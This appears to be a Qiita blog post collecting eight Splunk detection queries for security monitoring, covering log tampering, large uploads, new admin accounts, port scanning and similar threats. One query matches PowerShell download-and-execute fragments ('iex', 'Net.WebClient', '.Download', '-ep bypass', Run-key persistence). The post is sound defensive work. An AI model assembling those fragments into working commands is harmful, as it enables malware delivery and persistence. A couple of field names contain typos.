LoginSignup
1
3
@KatayamaMakoto(片山 真)

Splunk Use Cases

Last updated at Posted at 2022-04-29

1- Windows Audit Log Tampering

Check for any tampering done to Windows audit logs.

index=__your_sysmon_index__ (sourcetype=wineventlog AND (EventCode=1102 OR EventCode=1100)) OR (sourcetype=wineventlog AND EventCode=104)
| stats count by _time EventCode Message sourcetype host

2- Finding Large Web Uploads

Find large file uploads that could point to data exfiltration in your network.

index=__your_sysmon_index__ sourcetype=websense*
| where bytes_out > 35000000
| table _time src_ip bytes* uri

3- Detecting Recurring Malware on Host

Using anti-virus logs to detect if malware is recurring on a host after being removed.

index=__your_sysmon_index__ sourcetype=symantec:*
| stats count range(_time) as TimeRange by Risk_Name, Computer_Name
| where TimeRange>1800
| eval TimeRange_In_Hours = round(TimeRange/3600,2), TimeRange_In_Days = round(TimeRange/3600/24,2)

4- Detecting Unencrypted Web Communications

Find unencrypted web communications that could lead to a data breach.

index=__your_sysmon_index__ sourcetype=firewall_data dest_port!=443 app=workday*
| table _time user app bytes* src_ip dest_ip dest_port

5- Finding New Local Admin Accounts

Often an attack will include the creation of a new user, followed by permissions being elevated to an admin level.

index=win_servers sourcetype=windows:security EventCode=4720 OR (EventCode=4732 Administrators)
| transaction Security_ID maxspan=180m
| search EventCode=4720 EventCode=4732
| table _time, EventCode, Recurity_ID, SamAccountName

6- Finding Interactive Logins From Service Accounts

Most service accounts should never interactively log into servers.

index=systems sourcetype=audit_logs user=svc_*
| stats earliest(_time) as earliest latest(_time) as latest by user, dest
| eval isOutlier=if(earliest >= relative_time(now(), "-1d@d"), 1, 0)
| convert ctime(earliest) ctime(Latest)

7- Suspicious PowerShell Commands

Look for logs with commands that try to download external scripts/content or bypass PowerShell.

index=windows source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104
AND ((ScriptBlockText=*-noni* *iex* *New-Object*) OR (ScriptBlockText=*-ep* *bypass* *-Enc*) OR
(ScriptBlockText=*powershell* *reg* *add*
*HKCU\\software\\microsoft\\windows\\currentversion\\run*) OR (ScriptBlockText=*bypass* *-
noprofile* *-windowstyle* *hidden* *new-object* *system.net.webclient* *.download*) OR
(ScriptBlockText=*iex* *New-Object* *Net.WebClient* *.Download*))
| table Computer, ScriptBlockText, UserID

8- Detecting Network and Port Scanning

Look for distinct count of destination ports within a short span of time.

| from datamodel:"Network_Traffic"."All_Traffic"
| stats dc(dest_port) as dc_dest_port by src, dest
| where dc_dest_port > 10
1
3
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
1
3